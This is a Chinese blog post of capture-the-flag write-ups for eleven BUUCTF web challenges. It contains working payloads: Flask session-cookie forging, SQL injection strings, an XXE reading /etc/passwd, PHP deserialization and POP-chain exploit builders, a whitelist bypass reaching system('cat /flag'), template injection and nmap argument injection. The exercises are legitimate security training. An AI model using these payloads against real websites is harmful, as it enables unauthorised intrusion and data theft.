BUUCTF刷题十一道(05)

最新推荐文章于 2024-06-15 18:15:57 发布
最新推荐文章于 2024-06-15 18:15:57 发布
阅读量1k 收藏
点赞数
分类专栏: Web 靶场 文章标签: 网络安全 ctf web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45837896/article/details/121503996
版权
Web 同时被 2 个专栏收录
22 篇文章 0 订阅
订阅专栏
靶场
9 篇文章 0 订阅
订阅专栏

文章目录

[HCTF 2018]admin

参见大佬https://blog.csdn.net/weixin_44677409/article/details/100733581

flask session

----------------------题目提示信息-------------------------

  1. 随便注册登录,index页面<--you are not admin-->
  2. 修改密码界面,<--源码地址-->

----------------------做题-------------------------

  1. 查源码,app/routes.py显示了页面有的所有功能
  2. templates/index.html显示了session['name']==admin就有flag
  3. flask中session是存储在客户端cookie中,解密session内容
#-------------session解密-------------------
#!/usr/bin/env python3
import sys
import zlib
from base64 import b64decode
from flask.sessions import session_json_serializer
from itsdangerous import base64_decode

def decryption(payload):
    payload, sig = payload.rsplit(b'.', 1)
    payload, timestamp = payload.rsplit(b'.', 1)

    decompress = False
    if payload.startswith(b'.'):
        payload = payload[1:]
        decompress = True

    try:
        payload = base64_decode(payload)
    except Exception as e:
        raise Exception('Could not base64 decode the payload because of '
                         'an exception')

    if decompress:
        try:
            payload = zlib.decompress(payload)
        except Exception as e:
            raise Exception('Could not zlib decompress the payload before '
                             'decoding the payload')

    return session_json_serializer.loads(payload)

if __name__ == '__main__':
    print(decryption(sys.argv[1].encode()))

  1. 解密结果
    在这里插入图片描述

  2. 但是如果我们想要加密伪造生成自己想要的session还需要知道SECRET_KEY,然后我们在config.py里发现了SECRET_KEY
    在这里插入图片描述

  3. 替换nameadmin进行加密

https://github.com/noraj/flask-session-cookie-manager

#-----------session加密---------

#!/usr/bin/env python3
""" Flask Session Cookie Decoder/Encoder """
__author__ = 'Wilson Sumanang, Alexandre ZANNI'

# standard imports
import sys
import zlib
from itsdangerous import base64_decode
import ast

# Abstract Base Classes (PEP 3119)
if sys.version_info[0] < 3: # < 3.0
    raise Exception('Must be using at least Python 3')
elif sys.version_info[0] == 3 and sys.version_info[1] < 4: # >= 3.0 && < 3.4
    from abc import ABCMeta, abstractmethod
else: # > 3.4
    from abc import ABC, abstractmethod

# Lib for argument parsing
import argparse

# external Imports
from flask.sessions import SecureCookieSessionInterface

class MockApp(object):

    def __init__(self, secret_key):
        self.secret_key = secret_key


if sys.version_info[0] == 3 and sys.version_info[1] < 4: # >= 3.0 && < 3.4
    class FSCM(metaclass=ABCMeta):
        def encode(secret_key, session_cookie_structure):
            """ Encode a Flask session cookie """
            try:
                app = MockApp(secret_key)

                session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))
                si = SecureCookieSessionInterface()
                s = si.get_signing_serializer(app)

                return s.dumps(session_cookie_structure)
            except Exception as e:
                return "[Encoding error] {}".format(e)
                raise e


        def decode(session_cookie_value, secret_key=None):
            """ Decode a Flask cookie  """
            try:
                if(secret_key==None):
                    compressed = False
                    payload = session_cookie_value

                    if payload.startswith('.'):
                        compressed = True
                        payload = payload[1:]

                    data = payload.split(".")[0]

                    data = base64_decode(data)
                    if compressed:
                        data = zlib.decompress(data)

                    return data
                else:
                    app = MockApp(secret_key)

                    si = SecureCookieSessionInterface()
                    s = si.get_signing_serializer(app)

                    return s.loads(session_cookie_value)
            except Exception as e:
                return "[Decoding error] {}".format(e)
                raise e
else: # > 3.4
    class FSCM(ABC):
        def encode(secret_key, session_cookie_structure):
            """ Encode a Flask session cookie """
            try:
                app = MockApp(secret_key)

                session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))
                si = SecureCookieSessionInterface()
                s = si.get_signing_serializer(app)

                return s.dumps(session_cookie_structure)
            except Exception as e:
                return "[Encoding error] {}".format(e)
                raise e


        def decode(session_cookie_value, secret_key=None):
            """ Decode a Flask cookie  """
            try:
                if(secret_key==None):
                    compressed = False
                    payload = session_cookie_value

                    if payload.startswith('.'):
                        compressed = True
                        payload = payload[1:]

                    data = payload.split(".")[0]

                    data = base64_decode(data)
                    if compressed:
                        data = zlib.decompress(data)

                    return data
                else:
                    app = MockApp(secret_key)

                    si = SecureCookieSessionInterface()
                    s = si.get_signing_serializer(app)

                    return s.loads(session_cookie_value)
            except Exception as e:
                return "[Decoding error] {}".format(e)
                raise e


if __name__ == "__main__":
    # Args are only relevant for __main__ usage
    
    ## Description for help
    parser = argparse.ArgumentParser(
                description='Flask Session Cookie Decoder/Encoder',
                epilog="Author : Wilson Sumanang, Alexandre ZANNI")

    ## prepare sub commands
    subparsers = parser.add_subparsers(help='sub-command help', dest='subcommand')

    ## create the parser for the encode command
    parser_encode = subparsers.add_parser('encode', help='encode')
    parser_encode.add_argument('-s', '--secret-key', metavar='<string>',
                                help='Secret key', required=True)
    parser_encode.add_argument('-t', '--cookie-structure', metavar='<string>',
                                help='Session cookie structure', required=True)

    ## create the parser for the decode command
    parser_decode = subparsers.add_parser('decode', help='decode')
    parser_decode.add_argument('-s', '--secret-key', metavar='<string>',
                                help='Secret key', required=False)
    parser_decode.add_argument('-c', '--cookie-value', metavar='<string>',
                                help='Session cookie value', required=True)

    ## get args
    args = parser.parse_args()

    ## find the option chosen
    if(args.subcommand == 'encode'):
        if(args.secret_key is not None and args.cookie_structure is not None):
            print(FSCM.encode(args.secret_key, args.cookie_structure))
    elif(args.subcommand == 'decode'):
        if(args.secret_key is not None and args.cookie_value is not None):
            print(FSCM.decode(args.cookie_value,args.secret_key))
        elif(args.cookie_value is not None):
            print(FSCM.decode(args.cookie_value))

用法:

加密
$ python{2,3} flask_session_cookie_manager{2,3}.py encode -s "ckj123" -t "{'_fresh': True, '_id': b'e4fea746b619e757fef8eb6fe45b963d0c391cbef50f551d746e589714863a56eef2661b57eef7455fe5651527c7634198ab6bcca1b25110a506c920ef485e9f', 'csrf_token': b'4fcbfd4b9451d7076f3dc2872ecbd2a52066c106', 'image': b'UVrJ', 'name': 'admin', 'user_id': '10'}"


.eJw9kE2PgjAURf_K5K1Z2CobE3cgYdFHcAqkb2MYQGihToIaPoz_fRozcX3uPTfvPeF8GZtbB_v7-Gg8OOsa9k_4-oE9kDxZKsItBqTRhD7JiiGngUw3KEOWZMqU6bng6aRW4YsCNRWKiUgxlMce15STzHaJrGYMWpcLGdrc9WOO5qhR1oPLO3_GyGYMTTajjLdqrbhY0zmRXed2tOLYiSJeUIaziEImAjKJjCfX3SRBPiSFOsDLg-o2Xs733765fk7AiIyy1GMU-25mpqCacCUr-MkI026FzR1PFyWzRQSKqzWcsD28ddqWbfMx5Tkt3__kWloHoKytvoIHj1szvv8GbAOvP6-LbQI.YZz62Q.ZzGTTvS2bHfLIZhDxCR04tbEhqo

在这里插入图片描述

========================================================

[网鼎杯 2018]Fakebook

  1. 登录之后view.php页面存在sql注入

  2. 同时观察源码发现内容以data文件流写出

在这里插入图片描述

  1. payload
view.php?no=1 and updatexml(1,concat('~',(select database()),'~'),1)#
view.php?no=1 and updatexml(1,concat('~',(select table_name from information_schema.columns where table_schema=database() limit 1,1),'~'),1)#
view.php?no=1 and updatexml(1,concat('~',(select column_name from information_schema.columns where table_name='users' limit 1,1),'~'),1)#

# fakebook->users->username,passwd,data

view.php?no=1 and updatexml(1,concat('~',(select right(data,70) from users),'~'),1)#

# right($s,$x)中参数x从100缩小可以得到完整内容

#O:8:"UserInfo":3:{s:4:"name";s:5:"admin";s:3:"age";i:12;s:4:"blog";s:29:"file:///var/www/html/flag.php";}

#这里的blog内容已经构造好了

最终

view.php?no=-1/**/union/**/select/**/1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:5:"admin";s:3:"age";i:12;s:4:"blog";s:29:"file:///var/www/html/flag.php";}' from users#

在这里插入图片描述
查看页面源码,base64解码得flag

========================================================

[NCTF2019]Fake XML cookbook

https://blog.csdn.net/qq_52907838/article/details/118030007

XXE
在这里插入图片描述

抓包发现登录框可以HTML注入

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
  <!ENTITY admin SYSTEM "file:///flag">
  ]>
  <!--file:///etc/passwd--><!--读目录-->
<user><username>&admin;</username><password>123456</password></user>

========================================================

[安洵杯 2019]easy_serialize_php

-------------------------字符逃逸-----------------------------

参见https://www.cnblogs.com/LLeaves/p/12813992.html

在这里插入图片描述
extract:从数组中将变量导入到当前的符号表

  1. phpinfo页面关键信息
    在这里插入图片描述
    说明要读取d0g3_flag.php里面的内容,直接访问是访问不到的

分析一下源码:

<?php

$function = @$_GET['f'];//传function

function filter($img){//过滤字符为空,字符逃逸关键点
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}


if($_SESSION){//先清空SESSION为后面赋值开路
    unset($_SESSION);
}

$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;
//SESSION当前只有两个键值对

extract($_POST);//从$_POST中提取键值对,变量覆盖关键点

if(!$function){//首页
    echo '<a href="index.php?f=highlight_file">source_code</a>';
}

if(!$_GET['img_path']){//传值img_path或者不传设置SESSION['img'],没关系
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

$serialize_info = filter(serialize($_SESSION));//序列化之后

if($function == 'highlight_file'){
    highlight_file('index.php');
}else if($function == 'phpinfo'){
    eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
    $userinfo = unserialize($serialize_info);
    echo file_get_contents(base64_decode($userinfo['img']));
}

主要是三个关键点:

  1. 构造反序列化字符逃逸
  2. 绕过后面img的自动赋值
  3. 用extract进行变量覆盖

其中:

  1. 字符逃逸:
    两种情况:
    1. 关键字过滤导致字符减少,“flag”->“”,替换为空,这种情况用前一个键值吃掉(覆盖)后面的键值
    2. 关键字替换为更长的,“flag”->“fffff”,每替换一次逃逸出一个字符,所以直接在当前键值后面写序列化内容就行,也就是这道题用到的方法

  2. 根据前辈博客

    <?php
$str='a:2:{i:0;s:8:"Hed9eh0g";i:1;s:5:"aaaaa";}abc';
var_dump(unserialize($str));
>?
=================================
array(2) {
 [0]=>
 string(8) "Hed9eh0g"
 [1]=>
 string(5) "aaaaa"
}

    故反序列化在指定范围内进行,即使括号外有相同键赋值也不会影响反序列化过程,利用这一特性,可以利用变量覆盖user内容,构造function,user经过滤后吃掉function一部分内容,并提前结束反序列化范围,就能达到目的,下面上验证payload

    <?php

session_start();
unset($_SESSION);

function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}
$_SESSION["user"] = 'flagflagflagflagflagflag';
$_SESSION['function'] = 'a";s:3:"img";s:3:"yes";s:2:"aa";s:2:"bb";}';

$_SESSION['img'] = base64_encode('guest_img.png');

$b=serialize($_SESSION);

echo $b;

$c=filter($b);

var_dump(unserialize($c));

  3. 具体化到题目中就是payload
    GET: ?f=show_image
    POST: _SESSION[user]=flagflagflagflagflagflag&_SESSION[function]=a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"aa";s:2:"bb";}

    在这里插入图片描述
    替换base64值为该文件的就能得到flag

也可以用键逃逸

payload:_SESSION['flagflag']=";s:3:"aaa";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}
a:1:{s:8:"";s:51:"";s:3:"aaa";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";}

[CISCN 2019 初赛]Love Math

学习链接

<?php
error_reporting(0);
//听说你很喜欢数学,不知道你是否爱它胜过爱flag
if(!isset($_GET['c'])){
    show_source(__FILE__);
}else{
    //例子 c=20-1
    $content = $_GET['c'];
    if (strlen($content) >= 80) {
        die("太长了不会算");
    }
    $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]'];
    foreach ($blacklist as $blackitem) {
        if (preg_match('/' . $blackitem . '/m', $content)) {
            die("请不要输入奇奇怪怪的字符");
        }
    }
    //常用数学函数http://www.w3school.com.cn/php/php_ref_math.asp
    $whitelist = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];
    preg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/', $content, $used_funcs);  
    foreach ($used_funcs[0] as $func) {
        if (!in_array($func, $whitelist)) {
            die("请不要输入奇奇怪怪的函数");
        }
    }
    //帮你算出答案
    eval('echo '.$content.';');
}

题目要求:
1.长度不能超80
2.所用函数在白名单

用到函数:
1.base_convert( string $number, int $frombase, int $tobase) 函数:在任意进制之间转换数字。
2.dechex() 函数:把十进制转换为十六进制。
3.hex2bin() 函数:把十六进制值的字符串转换为 ASCII 字符。

该题用PHP动态变量特性,使用变量,拼接函数名以及函数中内容

吸收知识点:
因为中括号、引号被过滤了,可以用大括号代替

利用36进制可以得出任意小写字母,用它构造hex2bin

#十进制形式的37907361743转换回36进制是hex2bin
base_convert(37907361743,10,36)

_GET有大写要求,转换成十六进制,5f474554

疑惑:最终payload为什么不能直接放十六进制数,为什么要用十进制转十六进制转

payload:?c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));($$pi){pi}(($$pi){abs})&pi=system&abs=cat /flag

[WesternCTF2018]shrine

参考1
参考2

对模板注入这有点不太明白,先按着走吧
展现的有点不规则

1.ctrl+U看源码
在这里插入图片描述
测试:url+/shine/{{8*8}},返回64,存在ssti

注册了一个名为FLAG的config,猜测flag在此config中,若不存在过滤,可以使用{undefined{config}}查看app.config中的内容

在这要用到python的内置函数:url_for 和 get_flashed_messages
payload:/shine/{{url_for.__globals__}}

在这里插入图片描述
/shine/{{url_for.__globals__['current_app'].config}}

[网鼎杯 2020 朱雀组]Nmap

https://zhuanlan.zhihu.com/p/145906109

在这里插入图片描述
展现出来的好像是nmap功能,alt+u

在这里插入图片描述
提示flag在/flag

点下面那个按钮下面能看结果

在这里插入图片描述
点文件名能看详细信息,进去后看到他的url能传参,想着传flag文件名,显示错误页面

想能不能直接查<?php @eval($_GET[1]);?>,发现有防护机制

在这里插入图片描述
应该有关键词过滤,用短标签发现host maybe down

发现扫描ip之后都会将内容打出来,尝试能不能用nmap从/flag读取内容打印

-iL /flag -oN 1.txt

说something went wrong

学习了知乎文章之后才发现这里面还考了两个函数

escapeshellarg()escapeshellcmd()

escapeshellarg()将对整个字符串以单引号括住,并且将已经有的单引号转义再用反斜杠转义
在这里插入图片描述

escapeshellcmd()对字符串中可能会欺骗 shell 命令执行任意命令的字符进行转义。(如果是单个单引号出现,就将他转义,成对的没有危险)

127.0.0.1' -iL /flag -oN 1.txt '
'127.0.0.1'\'' -iL /flag -oN 1.txt '\'''
'127.0.0.1'\\'' -iL /flag -oN 1.txt '\\'''

这个文件名和最后的单引号之间必须有个空格

具体原因没有搞明白…

在这里插入图片描述

[MRCTF2020]Ezpop

用到的函数:

__invoke() 将对象当作函数来使用的时候,会自动调用该方法
__toString()当对象被当做一个字符串使用时调用。
__get():在调用私有属性的时候会自动执行
__wakeup():将在反序列化之后立即被调用,反序列化恢复对象之前调用该方法
__construct(): 在创建对象时候初始化对象,一般用于对变量赋初值。

观察源码:

传一个pop参数,对其进行反序列化

如果pop是一个Show类,执行__wakeup()

wakeup()preg_match()$this->source当作字符串比较,如果$this->source是Show类,就会触发__toString()

to_String()中有$str,如果$str是一个Test类,调用其没有的$source就会触发函数__get()

__get()返回以$p为名的函数,如果$p为实例化Modifier类,将其以函数形式调用,就会触发其中函数__invoke()

__invoke()函数调用append(),有include(),存在文件包含漏洞

利用文件包含漏洞读取flag.php

构造:

<?php

class Modifier {
    protected  $var='php://filter/read=convert.base64-encode/resource=flag.php';

}

class Show{
    public $source;
    public $str;
		public function __construct($file='index.php'){
        $this->source = $file;
    }
}


class Test{
    public $p;
}

$a=new Show('asd');
$a->str=new Test();
$a->str->p=new Modifier();
$b=new Show($a);

echo urlencode(serialize($b));

#O%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BO%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3Bs%3A3%3A%22asd%22%3Bs%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A8%3A%22Modifier%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A57%3A%22php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dflag.php%22%3B%7D%7D%7Ds%3A3%3A%22str%22%3BN%3B%7D

记得带构造函数
在这里插入图片描述

[SWPU2019]Web1

首页注入的话会提示登陆失败的,直接注册用户登录

在这里插入图片描述
申请文章的时候尝试注入
在这里插入图片描述
分别写了admin'root',发现广告名可以注入,显示使用的是’MariaDB’

or被过滤了,测列数用group by,注释符也不能用,其他师傅的博客都用了逗号+引号的方式闭合,不知道是什么原理,有知道的师傅可以解释一下吗?

-1'/**/group/**/by/**/22,'测到22列
在这里插入图片描述

显示列是2,3
MariaDB结构:
https://mariadb.com/kb/en/mysqlinnodb_table_stats/

利用mysql.innodb_table_stats查具体信息database_name|table_name
在这里插入图片描述

查数据库名:
-1'/**/union/**/select/**/1,version(),database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22

在这里插入图片描述
查表名:
-1'/**/union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats/**/where/**/database_name=database()),database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22

在这里插入图片描述

判断users列数:
-1'/**/union/**/select/**/1,(select/**/*/**/from/**/users/**/group/**/by/**/4),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22

测出来是4列,接下来无列名注入

-1'/**/union/**/select/**/1,(select/**/group_concat(a)/**/from/**/(select/**/1,2/**/as/**/a,3/**/as/**/b/**/union/**/select/**/*/**/from/**/users)x),database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22

在这里插入图片描述
换成b列应该就能看到了
在这里插入图片描述

[NPUCTF2020]ReadlezPHP

在这里插入图片描述
ctrl+U看源码

在这里插入图片描述
发现有time.php这个页面且带参数source,访问之

在这里插入图片描述
发现HelloPhp类的解构函数有个函数拼接

<?php

class HelloPhp
{
    public $a='ls';
    public $b='system';
}

$a=new HelloPhp;

echo urlencode(serialize($a));

没有回显,可能是过滤了

常见的函数执行:

* `eval`
* `preg_replace+/e`
* `assert`
* `call_user_func($参数,$函数)`

    `call_user_func_array()`

* `create_function($参数,$函数)`

用assert执行phpinfo,搜索flag

在这里插入图片描述

[MRCTF2020]PYWebsite

在这里插入图片描述
这个题看起来就很像买彩票那个,大家应该知道,或者买独角兽那道

在这里插入图片描述
进来震惊了,二维码好家伙,哈哈哈哈哈,好奇扫了一下发现并不是

老样子,ctrl+U

没什么内容,返回主页,源码

在这里插入图片描述
发现这么一段
访问一下flag.php

在这里插入图片描述
看起来要改XFF头验证来源的

直接改成127.0.0.1就可以了

PS

这11道拖了很久才回来继续写,最近抽时间赶一赶,刷!

Sprint#51264
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctf xss利用_Csrf+Xss组合拳
weixin_39699912的博客
12-12 124
本文首发于“合天智汇”公众号,作者: 影子各位大师傅,第一次在合天发文章,请多多关照今年年初的疫情确实有点突然,打乱了上半年的所有计划(本来是校内大佬带我拿奖的时刻,没了,学长毕业了,就剩下我这个小垃圾带着下一届去搞ctf了,难啊,难啊)0x01这个站是我疫情时候在线上网课的平台,本着对信息安全做贡献的目的下去做的这个渗透工作(咳咳,这个平台有个签到,每次签到我都在与大脑作斗争,最后争不过大脑,选...
Shiro框架漏洞分析与复现
m0_59598029的博客
04-18 1231
ApacheShiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性,可以快速轻松地保护任何应用程序——从最小的移动应用程序到最大的Web 和企业应用程序。
反序列化漏洞(3), CTF夺旗
探测???
11-17 140
Call 类中调用了 test1() 方法, 这不是一个魔术方法, 那么我们查看一下哪个类中直接调用了 test1() 这个方法, 看到在 start_gg 类中直接调用了 test1() 方法, 那么定位到 start_gg 类.func 中调用了 __invoke() 方法, 那么查找哪个类里面有用函数形式调用对象的代码, 看到 funct 类中使用 s1() 的形式调用, 那么让 mod1 作为一个对象即可, 定位到 funct 类.夺旗我们可以从调用链的终点开始分析.
shiro反序列化漏洞学习(工具+原理+复现)
最新发布
heike_Ch的博客
06-15 771
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
CTF——web个人总结
recover517的博客
05-28 1万+
包含个人总结的解思路、注入思路、文件包含思路、源码审计思路等
buuctf12(zip://包含& 取反+无参数rce & csrf & FFI扩展安全)
weixin_63231007的博客
02-19 1194
[极客大挑战 2020] Roamphp 1、2、4 rceme、5、6 flagshop、7 & 鹏程杯-简单的php
使用官方提供的帮助也下载不了源码的解决方案
android大牛MrJing 活动中心
09-01 2032
Downloading the Source Tree Installing Repo Repo is a tool that makes it easier to work with Git in the context of Android. For more information about Repo, see Version Control. To install, initia
arduleader
BBZZ2的专栏
04-23 1万+
 An Android/Linux ground controller in Scala This project began with the goal of having an Arduplane follow a hang-glider and take pictures. That work still continues (see the posixpilot subprojec
DPDK 全面分析
weixin_33889665的博客
02-02 5084
PS:欢迎大家关注我的公众号:aCloudDeveloper,专注技术分享,努力打造干货分享平台,二维码在文末可以扫,谢谢大家。 高性能网络技术 随着云计算产业的异军突起,网络技术的不断创新,越来越多的网络设备基础架构逐步向基于通用处理器平台的架构方向融合,从传统的物理网络到虚拟网络,从扁平化的网络结构到基于 SDN 分层的网络结构,无不体现出这种创新与融合。 这在使得网络变得更加可控制和成本...
BUUCTF逆向前八
01-24
在本篇中,我们将探讨在BUUCTF储备赛中遇到的前八道逆向目,通过这些目来学习如何使用逆向工具,如exeinfo和IDA,以及如何解析汇编代码以获取关键信息。 1. Easyre: 这道首先使用exeinfo查看文件信息,确认...
BasicASM.s(BUUCTF
06-04
分析过程文件
BUUCTF】MISC zip
01-20
import zipfile import string import binascii def CrackCrc(crc): for i in dic: for j in dic: for p in dic: for q in dic: s = i + j + p + q if crc == (binascii.crc32(s.encode())): ...
BUUCTF目(含工具),你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
04-09
BUUCTF目(含工具),你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
BUUCTF部分web
05-06
记录
Tutorial
MichaelAn的博客
02-13 3558
Tutorial Now that you've read the overview, it's adventure time! In this tutorial, we're going to build a Chess game with React and React DnD. I'm kidding! Wr...
逆向案例六——企名片科技数据解密,如何按步骤复制js代码
m0_57265868的博客
03-12 2445
在f上打上断点,运行,然后鼠标放在f上,复制f ,因为f可能是一个变化的,可能会跳转到其他js代码,在这里可以发现他是固定的,就在上方。铭记一点,复制js代码,缺少什么,就去找什么,同时断点也要一起跟着走。3. 下滑新使断点生效,可以看出object是一个方法,t.encrypt_data是密文。8.点击进入,复制函数,并在js中运行,发现没有a.a.decode。10.点击进入新页面,复制代码,并改写。6.复制到js中,运行,发现错误。7.在o处打上断点,并跳转。1.按关键字进行搜索。
Hive实战之Youtube数据集
热门推荐
_朝和
07-19 2万+
使用Youtube视频数据集进行Hive实战演练
MM顾问的常见面试问(ZZ)
congji9461的博客
06-18 1558
MM顾问的常见面试问ZZ:http://www.itpub.net/viewthread.php?tid=467412 这是MM顾问的常见面试问。 The following are some sample inte...
Java反序列化利用链挖掘之Shiro反序列化
HongYu012的博客
02-24 1197
在跟了一遍commons-collections系列的payload后,终于可以开始解决一下当时对shiro反序列化模凌两可的认识了。 当前,不管是国内实际的xx行动还是ctf比赛,shiro反序列化会经常看到。但在实际利用这个漏洞的时候,会发现我们无法在tomcat下直接利用shiro-sample中的commons-collections:3.2.1(2021-03-16更新,这里经p牛指正,shiro并没有依赖cc库,详情)。 我们前面已经对commons-collections系列利用链...
buuctf web
08-15
回答:根据引用和引用的内容,buuctf web应该是指buuctf比赛中的一个web目。其中可能涉及到Tornado作为非阻塞式服务器的使用,以及render函数的使用。而根据引用的内容,buuctf web目可能存在一些漏洞,比如SSRF(Server Side Request Forgery)漏洞,可以通过对内网web应用实施攻击获取webshell。因此,在buuctf web目中,可能需要掌握SSRF漏洞的利用和对web应用的渲染函数(render函数)进行利用。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [【CTF】buuctf web 详解(持续更新)](https://blog.csdn.net/m0_52923241/article/details/119641325)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [【BUUCTF】Web解方法总结(一)](https://blog.csdn.net/qq_45834505/article/details/114276572)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [BUUCTF的Web真学习整理(一)](https://blog.csdn.net/qq_41429081/article/details/98042205)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值